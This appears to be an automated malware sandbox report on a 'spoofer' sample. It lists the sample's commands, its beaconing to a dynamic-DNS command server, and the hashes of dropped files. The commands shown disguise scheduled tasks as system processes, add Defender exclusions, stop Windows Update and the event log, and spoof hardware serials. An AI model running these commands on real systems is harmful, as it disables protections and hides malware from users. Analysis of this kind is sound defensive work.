"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428805HP-TRGT24489FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528805HP-TRGT24489SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828805HP-TRGT24489SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228805HP-TRGT24489RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: R435-2NI5

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: R435-2NI5

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: LZ67-VM9H

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: LZ67-VM9H

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 51JH-3TN2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 51JH-3TN2

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 6VJR-O4LJ

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 6VJR-O4LJ

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: SGHT-FSK6

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: SGHT-FSK6

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: U68V-VZ6Z

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: U68V-VZ6Z

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\odt\StartMenuExperienceHost.exe'" /f

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Windows\Temp\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 13 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 9 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\powershell.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\odt\StartMenuExperienceHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\odt\StartMenuExperienceHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Application Data\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Application Data\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Idle.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: ILF2-306G

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Idle.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Windows\Temp\csrss.exe'" /rl HIGHEST /f

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: ILF2-306G

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Application Data\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Temp\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Application Data\RuntimeBroker.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Idle.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Temp\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\StartMenuExperienceHost.exe'

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: R6RK-9TE5

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YNjaADP11G.bat"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: R6RK-9TE5

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "driverupdate"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: TRTZ-EKBB

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "driverupdate"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: VLO2-GEZD

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: TRTZ-EKBB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: VLO2-GEZD

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: 8K70-TJOJ

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: 8K70-TJOJ

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 283C-NVU8

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 283C-NVU8

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: MPNA-10IL

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: MPNA-10IL

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: E6G0-1ZPS

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: E6G0-1ZPS

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TBJO-MUIH

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TBJO-MUIH

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: DKKV-PKAA

C:\ProgramData\VC_redist.x64.exe

C:\ProgramData\VC_redist.x64.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: DKKV-PKAA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 8F5F-1HKU

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 8F5F-1HKU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: NBN5-B84F

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: NBN5-B84F

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: ULLK-RAET

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: ULLK-RAET

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: KTNJ-FEK6

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: KTNJ-FEK6

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: C8PH-64CH

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: C8PH-64CH

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 988A-UHHG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 988A-UHHG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 58L6-A0AP

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 58L6-A0AP

Network

Country Destination Domain Proto
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 17.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 brofisthej.ddns.net udp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 198.111.78.13.in-addr.arpa udp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/2452-0-0x0000000074680000-0x0000000074C31000-memory.dmp

memory/2452-1-0x0000000074680000-0x0000000074C31000-memory.dmp

memory/2452-2-0x0000000000FB0000-0x0000000000FC0000-memory.dmp

memory/2452-3-0x0000000074680000-0x0000000074C31000-memory.dmp

memory/2452-4-0x0000000074680000-0x0000000074C31000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 6325b6182c988ad8d54e7122a140e6b5
SHA1 4b1f8a319f9b29ab3707814ec329ebf07f2cc7cf
SHA256 c3ffcf8f947ae9766f07dc024a4a8372fc854333d9c561ade4d923f744ba52f8
SHA512 4f2e388a2fc7c52e5408490508d13c8dba290f98559f4ec178fdf220990b33b9c2fb7a159f777beca585694f9b9d6eb71f47ef45da61f4631a7d625c04f614c9

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 64a5d40d76e76be2500f5b1de2c7cc30
SHA1 e9686932695bcd0eaef0bb8d4fc59a52030f90b0
SHA256 aaf32d00721e77dc86fad2711e1680d031e5acd8676128547eee09721f279436
SHA512 1dc930e1a632ba174ad5d71f412c103eb050cd27b088387b71216cd8af72e4868d61f4bdb592c086a1abe258161729d8d48cd93a5f1a52d7ac2c06afdb3eee36

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 fa39a2f1c265a76ad0331010cc675c3d
SHA1 e995206fd85eaacf73eb34e1a0682cc89707e8d7
SHA256 17793e77ef0ea732ca698d043b9c89c81e24ba063a60703c0614a041503b3413
SHA512 c42d1e993ced2d0b2e402a8bcbb45258243f87af13e58f518ed72ada4cf8d1f36062ef55ccd8494838e679e107134618c52c4427344bd8c4823a3a97280daf4c

memory/3684-16-0x0000000000160000-0x0000000000484000-memory.dmp

memory/3684-17-0x00007FF8A6610000-0x00007FF8A70D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe

MD5 4be192f79e66b6d817de7853d3b93c38
SHA1 18c030dfa65001c6ce8914e09c10aa9e1e1a9a66
SHA256 e01b7f059c4e05671c3589f6685943317b208ffe3e0eecbc139a0ea54564ece3
SHA512 58a4f9085038d416fd7864d91abcc4edbd0b7fba441595358d7b1b6a356685e5bb51ff9da019e8cff6dd673cd0566ef358242d1d3699f8468188367758f3190b

C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe

MD5 b23300557af343583a8ee4513f9a6ec2
SHA1 f5d8ad6525b47a40a76d7a2a58f45eb5d31671db
SHA256 9afa98012a8cfd2d98528432e6c22a9bcfd6600cdeae25fc261527174b60d133
SHA512 74db07c4187e88a0bcfe3fda0fa8779ae264de93435473d8d5376bdbf5fe3284445451d79c74dc9a92583dc23a2c50bbecd998eac5799a9de1e1814df761a6bb

C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe

MD5 4cde2704ba1f70df394d12972a9f0089
SHA1 e7e2edcefefb354a1d42c8bc6089c29168493aaf
SHA256 b8736adf57787251b019a95f431e2c8065a58c8dc946853e61c22b80dfa056cb
SHA512 12a5381096866e3a996000aba09182c074a55afc2d0af6d78e90eb76fbe93f3b211e91d78a72de458429777e4a97830b585a81818c8df23acde0b459d3f45c6c

memory/3512-29-0x0000000000400000-0x0000000001274000-memory.dmp

memory/2452-31-0x0000000074680000-0x0000000074C31000-memory.dmp

memory/3512-32-0x000000007FA70000-0x000000007FE41000-memory.dmp

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

MD5 9f6d01dde54a7635749ccb46ee55b60c
SHA1 ae92ca1a982d1c59271b3ade5842a6db81c7734e
SHA256 b5a6bac604b1109fd932b154b8c1beb35ab94b52c5085f69e3d291484544d8a5
SHA512 40e7927764ecb25fd72eb25fc31441b4ca4196da5493f2c14527b9258aa17072fa986848678e6e67ff7cf353a16d052e1ff7c3f1ed6b0f2cafdb69e39e2f65d4

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

MD5 b91fd6835686fcbe424710a3bc7d6875
SHA1 95ba044a0c7ef5e952cca3790aed6631a9c19090
SHA256 60bb8f713c811c53abbea4c8ed5305601c933ed116fe3f5397c8154eb9c9013f
SHA512 ca467234707ee5bff2cea6554a4f74bf95324725b129cdc43358f6bffedd9ea137361cab58c12526af64c3171fc1880aabf15dcf33b1a9d65747319244512fd4

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

MD5 3852d8a4224646c2925c7d9b6bbe2b01
SHA1 a7e4ae9295b3bef0cf3a96626b1cd73edab7bfc6
SHA256 debbd838c3c980c25da16aed115b2574f653b30471e4134b25472690c5e518d9
SHA512 2d03e5741e6e283576195de3420f3d879131bedb02e7831116c66427e7a3aeb0e7088b1882340c7ec5a9fe68b5d6b752522ae7e48fff08d7db60329c738ffbf5

C:\Users\Admin\AppData\Roaming\conhost_sft.exe

MD5 e0830c0edad924b513dd42350eae29f3
SHA1 6cc9c7b5ab750cd74674b8b2d81edc967dbabd53
SHA256 4ebc90356f8bcc7222401ea1b56480af5a18f701cc631d5cb04aebba8a3d4531
SHA512 6add31c8fe6e45a99d15620bb382bc633c46343fda92ded36d04475a21ce463ed1aa4f9f637efa179608cc58ab90cb834bd69706501293134826cd96d426e5d4

memory/3428-70-0x00007FF8A6610000-0x00007FF8A70D1000-memory.dmp

memory/3512-69-0x0000000000400000-0x0000000001274000-memory.dmp

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

MD5 acec1f9aeeaf540a542c10935731eb5f
SHA1 718d4723e6ca3b6ba683beb9a4518410f03d7aca
SHA256 57c4a0472d32cca25b20f7136075cc23dcbc8c4a17f3a05fd6a487071ceb7a01
SHA512 94b3efd79364b4f4a9bc201c7f78350f7dc2c987585dec9ce16efa6a247dbfc26461657949d195aaf4ab28826432ab72fd6977f4a69d6ea2d75daec504b50b11

memory/624-75-0x000000001BFC0000-0x000000001BFD0000-memory.dmp

memory/3428-76-0x0000000002470000-0x0000000002480000-memory.dmp

memory/3512-73-0x000000007FA70000-0x000000007FE41000-memory.dmp

memory/3684-71-0x00007FF8A6610000-0x00007FF8A70D1000-memory.dmp

memory/4484-88-0x0000000072C50000-0x0000000073400000-memory.dmp

memory/4484-92-0x0000000004F60000-0x0000000005588000-memory.dmp

memory/3428-93-0x00007FF8C58E0000-0x00007FF8C58E1000-memory.dmp

memory/3428-95-0x00007FF8C5A20000-0x00007FF8C5ADE000-memory.dmp

memory/4484-94-0x0000000002830000-0x0000000002840000-memory.dmp

memory/4484-91-0x0000000002830000-0x0000000002840000-memory.dmp

memory/3428-90-0x0000000000DD0000-0x0000000000DDE000-memory.dmp

memory/4484-87-0x0000000002840000-0x0000000002876000-memory.dmp

C:\Users\Admin\AppData\Roaming\conhost_sft.exe

MD5 f0dc17a5ad67849e86039c7247b74da2
SHA1 820d45cdffbee5c0b6754b2b4a75dd7bae2a41a2
SHA256 2adfb48095f51199ff22e7ebf0a1cd8a84b230e330a7c9919a9332b5ef169e11
SHA512 b6bca9800e661b05c348ee5bcd118c7d75c513124b0bc4dfa645a9b1c66bcd1716eebc8616ae09fc0c2863bfb0f0f720d3546ddc02aeefcfc4d69a3e3d138c4c

C:\Users\Admin\AppData\Roaming\conhost_sft.exe

MD5 56d82846e9da7285db15f499dd025d31
SHA1 48c597f6848ed3d9f9c35311e215b14436c8339c
SHA256 1bf087669de8a79ae3bab44a4b62e0ccf21bfa229c9984969a399ab0a04b4ebb
SHA512 95dc3ab8772c0531c8899ea65d5e011bac7189c6876a14e9b77a3f922e1c78273f936bd4fd971c900c0bcf1050f5b0a6a685429cc6844ee3fcb367f6155bd0a1

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

MD5 49d30b89b9cdcca91e0e9e04b5d71d27
SHA1 ebf294802e9ba3249eb7b6b972d9a314f7f044f0
SHA256 ab203a4a616e98fe6548bfac0a981032f43d6521b5852d799a025f52919bc542
SHA512 08c6fb9ae277862c76afa5b7e21a95c2760c06d70716eebeeb71515f376c3c2b3303d1cfd78e2672576751c681b97fd1f00c462a3d4987bbd1b45e8114bfcc8c

memory/3428-65-0x00000000003A0000-0x000000000048A000-memory.dmp

memory/624-55-0x00007FF8A6610000-0x00007FF8A70D1000-memory.dmp

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

MD5 2038b9e09e99a9083458fb0eaf4d51a4
SHA1 d6416dcc45990a71d6cfbc0a9c8914784e6f68ac
SHA256 c44c1dbdde6fdb118b26bb67f1db28ee8012d17fc5685a7a0271dcbd96f0e585
SHA512 e69961d0ce3fd4d4d173381dad25f163e238dc00b80b749ce6085631211e86b211af802747f96e71d26d0b28c5eccaaf548481ba79b02ead792ceb7ad15c45a3

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

MD5 2988aa0f63cdebfb1cd4a9a24e60474f
SHA1 9942f673deb1dcb116a42bf7be1bb2e0cec412e5
SHA256 cb5c25a40ea40d180662919f99dd57f34c2a8a43900bd181f252c4acaeb8201b
SHA512 8ac470b38031cd8d52ce7eb37152987a6b1ba09d692846cf84b754dfff1b22615e9eca141c1d0b98ce8d7b56d877e0d6c16f85213c082a62c835f89311576199

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

MD5 da84ba44a6138800c1ec16593b28889b
SHA1 17abb91c89d569c126a42e80b11cf9c366571377
SHA256 9b2137fed933d63a09fbdd2d4a678b0b72162a19d902f5183dadc69a65201293
SHA512 8d83b2de79ee5f1ce320c389d07d0a92f22dee9a56f8619ae0e71b50d0d4be9b9e6a29cadd3dd243e224c796d2aa06792a04d4b6e4b96c219c3e0d13c45d4c06

memory/3428-98-0x00007FF8C58D0000-0x00007FF8C58D1000-memory.dmp

memory/3428-97-0x0000000002420000-0x000000000243C000-memory.dmp

memory/3428-101-0x0000000002440000-0x0000000002458000-memory.dmp

memory/3428-102-0x00007FF8C58C0000-0x00007FF8C58C1000-memory.dmp

memory/3428-99-0x0000000002520000-0x0000000002570000-memory.dmp

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

MD5 81a45f1a91448313b76d2e6d5308aa7a
SHA1 0d615343d5de03da03bce52e11b233093b404083
SHA256 fb0d02ea26bb1e5df5a07147931caf1ae3d7d1d9b4d83f168b678e7f3a1c0ecd
SHA512 675662f84dfcbf33311f5830db70bff50b6e8a34a4a926de6369c446ea2b1cf8a63e9c94e5a5c2e1d226248f0361a1698448f82118ac4de5a92b64d8fdf8815d

memory/3428-109-0x00007FF8C58B0000-0x00007FF8C58B1000-memory.dmp

memory/4484-108-0x0000000004E30000-0x0000000004E52000-memory.dmp

memory/3428-107-0x0000000000DE0000-0x0000000000DEE000-memory.dmp

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

MD5 ae0b386ad95cc13660e5d53dee22ff96
SHA1 a1cefca496e818e1eb211879fa42ae645de4c851
SHA256 acfe276498ce8a75334c5f6329d61412e87fad6887ad94c68cc48773d5645e46
SHA512 e25427453eadaf073d9d7640cf2b23e5922b9f6561450d8b328b128d1dbd3ee016139470f4b08217e39ea4505780feb9bf0cdb3f4da4cc7296ad7638af49ec75

memory/3428-111-0x0000000000DF0000-0x0000000000DFE000-memory.dmp

memory/624-112-0x000000001CFD0000-0x000000001D082000-memory.dmp

memory/3428-113-0x00007FF8A6610000-0x00007FF8A70D1000-memory.dmp

memory/3428-114-0x00007FF8C58A0000-0x00007FF8C58A1000-memory.dmp

memory/4484-117-0x0000000005780000-0x00000000057E6000-memory.dmp

memory/3428-116-0x0000000002460000-0x000000000246C000-memory.dmp

memory/3428-119-0x00007FF8C5890000-0x00007FF8C5891000-memory.dmp

memory/624-118-0x00007FF8A6610000-0x00007FF8A70D1000-memory.dmp

memory/3428-121-0x00007FF8C5880000-0x00007FF8C5881000-memory.dmp

memory/4484-120-0x00000000057F0000-0x0000000005856000-memory.dmp

memory/3428-123-0x00000000024D0000-0x00000000024DE000-memory.dmp

C:\ProgramData\Microsoft\Windows\Disk.bat

MD5 250e75ba9aac6e2e9349bdebc5ef104e
SHA1 7efdaef5ec1752e7e29d8cc4641615d14ac1855f
SHA256 7d50c4fdcf6d8716c7d0d39517d479b3eeee02d2020ed635327405ae49c42516
SHA512 7f0d7d41c9eafcd65daa674b5182cf52e11aa0f6d6baaee74fe4c4ffc08a163277c4981cd123af0cb1857ae6fd223b5e8c676d9dc5c646a870fbd9bc4001c438

memory/3428-127-0x00000000024E0000-0x00000000024EC000-memory.dmp

memory/3428-128-0x0000000002470000-0x0000000002480000-memory.dmp

memory/3428-130-0x00007FF8C5870000-0x00007FF8C5871000-memory.dmp

memory/4484-129-0x0000000072C50000-0x0000000073400000-memory.dmp

memory/624-125-0x000000001BFC0000-0x000000001BFD0000-memory.dmp

memory/4484-131-0x0000000002830000-0x0000000002840000-memory.dmp

